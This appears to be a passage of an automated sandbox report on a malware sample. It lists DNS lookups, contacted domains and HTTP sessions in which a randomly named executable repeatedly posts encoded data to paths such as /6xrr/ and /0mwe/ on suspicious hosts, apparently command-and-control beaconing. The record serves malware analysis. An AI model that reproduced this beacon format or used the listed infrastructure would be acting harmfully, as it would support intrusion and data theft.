                                                            Nov 20, 2024 21:10:00.589481115 CET1.1.1.1192.168.2.50x8e45No error (0)www.yunlekeji.top106.15.109.33A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:16.981148958 CET1.1.1.1192.168.2.50xff28No error (0)www.logidant.xyzlogidant.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Nov 20, 2024 21:10:16.981148958 CET1.1.1.1192.168.2.50xff28No error (0)logidant.xyz45.141.156.114A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:32.427583933 CET1.1.1.1192.168.2.50xebb1No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Nov 20, 2024 21:10:32.427583933 CET1.1.1.1192.168.2.50xebb1No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:32.427583933 CET1.1.1.1192.168.2.50xebb1No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:32.427583933 CET1.1.1.1192.168.2.50xebb1No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:32.427583933 CET1.1.1.1192.168.2.50xebb1No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:47.624433041 CET1.1.1.1192.168.2.50x9ba9No error (0)www.zkdamdjj.shop104.21.40.167A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:47.624433041 CET1.1.1.1192.168.2.50x9ba9No error (0)www.zkdamdjj.shop172.67.187.114A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:11:03.291230917 CET1.1.1.1192.168.2.50x9924No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:11:03.291230917 CET1.1.1.1192.168.2.50x9924No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:11:17.981044054 CET1.1.1.1192.168.2.50x7b1dNo error (0)www.brightvision.website203.161.42.73A (IP address)IN (0x0001)false
                                                            • www.izmirescortg.xyz
                                                            • www.aballanet.cat
                                                            • www.madhf.tech
                                                            • www.canadavinreport.site
                                                            • www.yunlekeji.top
                                                            • www.logidant.xyz
                                                            • www.laohub10.net
                                                            • www.zkdamdjj.shop
                                                            • www.tals.xyz
                                                            • www.brightvision.website
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549748104.21.36.62806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:08:56.420675993 CET373OUTGET /lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.izmirescortg.xyz
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:08:57.827461958 CET1104INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:08:57 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KScnn1MU9%2BxRfTJro3YPICHi4D1YPn%2F1oyO5KNSBtQgkqtWUsJAdU6OK%2FFelyJfisitUXQlrPBxByPwPanZG4SOeGyhWTF9oWULlFHZKn5zWfvPEZoc977ttt9Tybp3Y5%2FkUGn4%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e5b132f0d1942e7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=373&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549786134.0.14.158806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:13.912570000 CET634OUTPOST /6xrr/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.aballanet.cat
                                                            Origin: http://www.aballanet.cat
                                                            Referer: http://www.aballanet.cat/6xrr/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d
                                                            Data Ascii: sVC8z=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549793134.0.14.158806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:16.578704119 CET654OUTPOST /6xrr/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.aballanet.cat
                                                            Origin: http://www.aballanet.cat
                                                            Referer: http://www.aballanet.cat/6xrr/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 49 38 74 54 70 65 45 6b 6e 48 38 66 75 71 30 52 4d 72 42 57 72 79 77 2f 69 52 69 78 54 2b 65 2f 74 50 6d 47 39 77
                                                            Data Ascii: sVC8z=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDI8tTpeEknH8fuq0RMrBWryw/iRixT+e/tPmG9w


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549800134.0.14.158806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:19.239890099 CET1671OUTPOST /6xrr/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.aballanet.cat
                                                            Origin: http://www.aballanet.cat
                                                            Referer: http://www.aballanet.cat/6xrr/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 57 37 48 44 7a 49 4b 2f 52 78 35 5a 79 33 4c 79 75 7a 66 35 6a 6b 75 4d 55 76 71 32 59 2b 43 6e 6a 6d 6d 50 75 70 67 33 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 76 4d 4b 33 36 53 4a 65 34 53 51 68 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 78 74 [TRUNCATED]
                                                            Data Ascii: sVC8z=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJW7HDzIK/Rx5Zy3Lyuzf5jkuMUvq2Y+CnjmmPupg3iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIvMK36SJe4SQhRE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHo4CPWl4goDYbh4HPcvNOiuDBXt1FtRK/ligONTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHAqpk1uJYZVsyRSuxwIUACK4C4mRg5yxFISplP3LXFb1K0hpk3DoYLGxDdGhBse5ukTqEAMgr4kZvdbnTVDfXSN27zvaDQTLCUev227Y/+NpDAlQSlzPXlzKqJvsXkhzKp36nuiM+gBAD22tpOdrgdyROqwD6HXzYvwjsKODrpROu/YOGh68dTCGWx/dSqlYMCI4VUd5iHbrDrUfgiI8S9tZGTAScwIl6CP8+MasiNL93H7TvkLfg1VKZhVWWSV+lP6/1TiZv0uosQJ7y4wMEU24xDthdgfhCZVIX6+a9rmEJjnUWC5B13sZyaFm9nfhvPDRIjT6HgjOb4nS3qgtHBfbLAWyrtpVf9hZaRs5kggJ64KF8w3R5s2fFBClszODNeKNA1Zbn8kD/HdPeVevR9ki+LLOjKdr29tXxEzSOFh8ngbpkbNOKYcf0VWvoYt6e+s5K2XKZLqoJ74yg0K/xBjqGtYMiKptW6BBaLbUCHHlCvFqw4DQxuJNiBHaM7lkcPu0cRZ/FVfSn6mfw [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549809134.0.14.158806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:21.907308102 CET370OUTGET /6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.aballanet.cat
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:09:23.856789112 CET498INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 20 Nov 2024 20:09:23 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549827103.224.182.242806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:30.190546989 CET625OUTPOST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 30 41 6b 72 73 34 42 48 6c 47 43 79 58 72 50 52 78 47 46 58 67 39 55 4b 33 58 36 55 63 65 4f 6a 51 6b 59 6a 6f 73 3d
                                                            Data Ascii: sVC8z=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2U0Akrs4BHlGCyXrPRxGFXg9UK3X6UceOjQkYjos=
                                                            Nov 20, 2024 21:09:31.501651049 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:31 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133371.1090000; expires=Sat, 18-Nov-2034 20:09:31 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                            Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549833103.224.182.242806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:32.860496998 CET645OUTPOST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 52 73 61 6b 66 4e 46 73 2f 6e 35 7a 30 6f 39 2f 37 4e 44 74 58 4b 34 49 76 4b 39 35 72 49 42 69 67 32 30 59 6c 4e
                                                            Data Ascii: sVC8z=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEARsakfNFs/n5z0o9/7NDtXK4IvK95rIBig20YlN
                                                            Nov 20, 2024 21:09:34.202760935 CET871INHTTP/1.1 200 OK
                                                            date: Wed, 20 Nov 2024 20:09:33 GMT
                                                            server: Apache
                                                            set-cookie: __tad=1732133373.4553886; expires=Sat, 18-Nov-2034 20:09:33 GMT; Max-Age=315360000
                                                            vary: Accept-Encoding
                                                            content-encoding: gzip
                                                            content-length: 576
                                                            content-type: text/html; charset=UTF-8
                                                            connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                            Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549840103.224.182.242806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:09:35.532941103 CET1662OUTPOST /0mwe/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.madhf.tech
                                                            Origin: http://www.madhf.tech
                                                            Referer: http://www.madhf.tech/0mwe/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 48 43 48 54 6a 35 71 63 45 4f 76 59 38 33 4c 79 6a 6b 7a 31 66 71 72 46 2f 50 47 79 34 43 49 2f 6f 6a 41 63 45 77 2b 78 76 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4e 67 45 4b 78 51 4d 45 57 65 64 70 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 69 65 [TRUNCATED]
